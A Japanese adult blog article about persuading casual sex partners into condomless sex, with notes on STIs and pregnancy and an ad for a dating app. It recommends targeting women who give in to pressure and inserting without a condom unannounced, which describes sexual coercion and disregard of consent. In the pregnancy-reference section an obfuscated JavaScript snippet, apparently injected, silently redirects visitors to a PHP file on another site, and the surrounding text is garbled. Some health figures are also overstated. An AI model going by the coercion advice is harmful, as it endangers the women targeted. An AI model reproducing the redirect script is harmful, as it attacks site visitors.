セフレと生でセックスしたい!生OKな女の子の特徴と注意点とは

  • このエントリーをはてなブックマークに追加
  • Pocket

経験のある人ならわかるでしょう。生セックスの気持ちよさ。生でのセックスはゴム有りセックスとは比較にならないほど気持ちいいですよね。

リスクを考えなくて良いのであれば、セックスは生でしたい男はたくさんいるはずです。むしろ誰もゴムなんてつけたくないでしょう。

もし気軽にセックスできるセフレが生挿入OKな女の子なら、それはそれはより最高なセックスライフになります。この記事では、生挿入させてくれるセフレの特徴と、注意点をご紹介します。これを読んで、セフレとの生セックスを楽しんじゃいましょう。

生セックスを許してくれるセフレの3つの特徴

まずは、セフレと生セックスしたい時に、OKしてくれる女の子の特徴を紹介します。すでにセフレがいるという人は、その子に生セックスをお願いするときの判断材料にしてください。

今はセフレがいないという人は、この特徴を参考にしてセフレを作ることで、生セックスでのセフレライフが楽しめますよ。

次のセフレを作る時の参考や、ワンナイトのセックスでの判断にも使えます。しっかり読んで、生がOKな女の子を見極められるようになりましょう。

1.押しに弱い性格である

もし、セフレの女の子が押しに弱い性格の場合、生セックスできる可能性が高いですね。

押しに弱く、相手の要求を断れないタイプの女の子は、生で挿入しても怒らないことが多いです。流されやすいタイプの女の子とも言えるでしょう。

ゴムをせずに生挿入しても流れで許してくれます。少し何か言われたとしても、それとなくかわせば、それ以上強く言われないです。むしろ押しに弱い女の子は、何も言わないことの方が多いです。

セフレと遊んでいる時に優柔不断な一面が見えれば、押しに弱い女の子である可能性が高いです。

例えば、レストランや居酒屋でメニュー選びに時間がかかる、「何して遊びたい?」と聞いても特に要望がない、ショッピングがやたらと長い、◯日遊ぼう、まだ一緒にいようなどの提案に断られたことがない、などは押しに弱い優柔不断な子の代表的な特徴です。

これらの特徴に当てはまれば、セックスするときさりげなく生でしてみましょう。おそらく、何も言われないor言われても強く断られないはずです。

ただし、安全日かどうか、ピルは飲んでいるかなど、妊娠のリスクには気をつけなければいけないので、注意は必要です。

押しに弱い女の子の特徴をまとめた記事もあります。合わせて読めば理解が深まるので、どうぞ。

2.恋愛感情がある

セフレの女の子があなたに対して恋愛感情がある場合も、生セックスOKな確率が高いです。

恋愛感情がある時は、好きな相手の要求を断れない女の子が多いんですよね。セフレがあなたに惚れていれば、「嫌われたらどうしよう」「断って気まずくなりたくない」という気持ちがでるので、なかなか断れなくなります。

黙って生挿入しても拒否されなかったり、生で挿れたいと言えば許可してくれる可能性は高いでしょう。また、かなり惚れ込んでいる場合は、相手の子から「生でしよう」と提案されることもあります。

ですがこの場合も、もちろん妊娠のリスクには注意が必要です。そしてやはり、セフレが恋愛感情を持っていると、後々ややこしいことにもなりがちなので、面倒な方向に行かないように気をつけましょう。

3.ピルを飲んでいる

1番いいのは、セフレがピルを飲んでいるパターンです。最近では、生理痛を和らげたりするためにピルを飲んでいる女の子は増えてきました。

実は産婦人科用のピルは、きちんと服用していればコンドームよりも高い避妊率(約99%の避妊率)を誇ります。つまり、ピルを正しく飲んでいる女の子とはどれだけ生セックスをしたとしても、ゴム有り挿入より妊娠しにくいのです。

そのため、ピルを飲んでいる多くの女の子は、生挿入を許可してくれます。ただ、ピルを飲んでいても、性病などを恐れて生セックスを拒む子もいるので、全員がOKしてくれるとは限りません。

女の子がピルを飲んでいるかどうかは、外見や普通の会話からはなかなかわからないです。ですので、会話の中でうまく探っていくのがポイントと言えます。

妊娠を恐れるなら女の子にピルを飲んでもらうのが良い

生セックスさせてもらえるパターンを紹介しましたが、やっぱり妊娠のリスクを避けるなら、ピルを飲んでもらうのが1番確実でおすすめの方法です。コンドームより高い避妊率なので、生挿入中もお互いに安心してセックスを楽しめます。

しかも生セックスだけじゃなく、中出しもOKです。またピルを飲めば生理痛も和らぐので、女の子にとっても一石二鳥。そのようなメリットを説明して、セフレにうまくピルを飲んでもらいましょう。

生セックスがしたくてピルの服用をお願いするときには、費用を折半してあげるとOKしてもらいやすくなります。もしくは、男らしく全額出してあげるのもいいですね。

1ヶ月単位で考えるとそんなに高額なわけではないので、安心して生セックスを楽しむためのお金と思えば、高くはありません。

セフレと生セックスする時の4つの注意点とは

ではここからは、生セックスする際の注意点について具体的に説明していきます。先ほどもちらりと触れましたが、主に気をつけるポイントは「性病」と「妊娠」です。

これらのリスクと、注意すべきことや対策をしっかり理解した上で、セフレとの生セックスを楽しみましょう。「妊娠しないかな」「性病にかからないかな」と心配しながらの生セックスは、気持ちよさも半減してしまいますよ。こちらもしっかり最後まで読んでくださいね。

1.性病になってしまうリスクを忘れない

まず生でセックスする場合、常に性病のリスクがあるので、そこに注意しなければいけません。しかも、相手の女の子が性病を持っていた場合には高確率で感染します。

性病とは、医学的には「性感染症」と言われています。感染源は体液である精液、膣分泌液、血液の中に含まれいて、セックスをすることで主に人体の粘膜(陰茎、膣、肛門、尿路)を介して感染します。粘膜を通して感染するので、お互いの粘膜が触れ合う生挿入は、どうしても感染率が高くなってしまうのです。

性器ヘルペス、淋菌感染症、尖圭コンジローマ、梅毒、性器クラミジア感染症など様々な種類が存在します。症状が重いものから軽いものが存在します。いずれにせよ、性病への感染は嬉しいものではないので、避けたいところでしょう。

性器に痛みやかゆみを伴うものありますし、感染したら完治するまでセックスできないものもあるので、リスクは低くないです。また女の子の場合、放って置くと妊娠できなくなるリスクもあるので、注意が必要です。

エイズも性感染症の一つです。生挿入するなら、事前に相手がたくさんの男と関係を持っていないかまず確認しましょう。

※参考
知っていますか?STDのこと -性感染症のはなし-|シー・アール・シー

2.安全日でも妊娠することがある

「安全日だから中に出していい」とか、「危険日だから生はダメ」という話を時々聞きますよね。女の子には、妊娠しやすい日と妊娠しにくい日があり、それは月経周期が関係しています。

通常、排卵日から約2週間後に次の月経がきます。つまり、毎回の月経開始日の周期が30日だとすれば、月経開始から約16日後が排卵日だろうということです。この時期を避ければ「安全日」ということですが、月経周期は人によっても違うし、周期が安定しない人も多いです。

そして、排卵日だけが危険日なのではありません。排卵日は1、2日前後することも珍しくないですし、膣内に射精された精子は3〜7日生き残ると言われています。つまり、排卵予想日の前後2日から数えて7日前までが危険日になります。

排卵日や月経開始日は、基礎体温を図るなどの方法でより精度をあげて推測することはできますが、これを信頼しすぎないように注意しましょう。あくまで推測であって日は前後しますし、確率が下がるというだけで安全日でも妊娠することはあるからです。

安全日だからと生でセックスすることには、妊娠する可能性はつきまとうのです。

※参考
$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor042/” target=”_blank” rel=”noopener noreferrer”>【たすけてドクター】042. 妊娠しやすい時期っていつ頃?

3.妊娠する恐れがあるので最後は外出しする

妊娠のリスクを避けたいのであれば、安全日かどうかに関わらず、中出しは避け常に外出しするようにましょう。

生セックスはこの上なく気持ちいいですが、そのままその勢いで膣内に射精してしまえば、やはり妊娠のリスクがかなり高まります。絶対に膣内射精は避けましょう。

もちろん外に出しても、生で挿入している限りはゴム有りセックスより妊娠リスクは高いです。大量の精子を膣内に送り込む中出しは、それよりはるかにリスクが高いです。たとえ安全日の生セックスでも中出しには気をつけましょう。

ただし、女の子がピルを飲んでいる場合は避妊率が高いので、中出ししてもほとんど妊娠しません。コンドームより高い避妊率で、危険日でも気にせず中出しが楽しめます。

4.外出しに失敗したらアフターピルを飲んでもらう

もしも中で出してしまった時のために、対応をしっかり知っておくことも大切です。外出しに失敗してしまったら、必ず女の子に「アフターピル」を飲んでもらいましょう。

セックスに慣れていない人は、外出しに失敗してうっかり中で射精してしまうことがあります。また、ついつい生セックスで興奮が高まって中出ししてしまう、という経験がある人もいるでしょう。

そのような場合は、アフターピルと呼ばれるピルを、できるだけ早く女の子に飲んでもらう必要があります。このアフターピルは、避妊失敗後24時間以内に服用すれば、99%の確率で妊娠を避けることができるものです。

セフレの女の子と産婦人科のあるクリニックか病院へ行けば処方してもらるので、なるべく早く行きましょう。

リスクを理解してセフレとの生セックスを楽しもう

何も知らずに生でセックスするのは、非常に高いリスクが付きまといます。しっかりリスクと対策を理解して、安心してセフレとの生セックスを楽しみましょう。

その上で、生挿入OKな女の子を見極めてセフレにすれば、最高に気持ちいい生セックス生活をおもいきり楽しむことができます。きちんと見極めれば、意外とOKしてくれる女の子はたくさんいますよ。この記事で説明した女の子の特徴と注意点を覚えるまで読んでしっかりと対策し、男の憧れの日々を手に入れてください。

ここまで全て読んでくれた読者のみなさんが、今では心配でなかなかできなかった生セックスを楽しめるようになることを陰ながら応援しています!

セフレとの中出しについてまとめた記事もあります。合わせて読めば、よりセフレとのセックスが楽しめるでしょう。

編集長おすすめの出会い系「PCMAX」

編集長みさわおすすめのマッチングアプリ「PCMAX」。

PCMAXを使った2020年の実績は、お持ち帰りした女の子22人。その中でセフレになった女の子10人です。

ナンパより効率的、クラブより低コスト。たくさんの女の子とワンナイトしたい、何人かの可愛いセフレが欲しい人にはぜひおすすめ。

登録は無料。攻略法さえ理解していれば、スタートダッシュ特典を使って2,000円で1人の女の子とセックスできます。まずは行動あるのみ。下のボタンから使ってみましょう!

PCMAXを使ってみる(R18)

おすすめの記事

  • このエントリーをはてなブックマークに追加
  • Pocket

SNSでもご購読できます。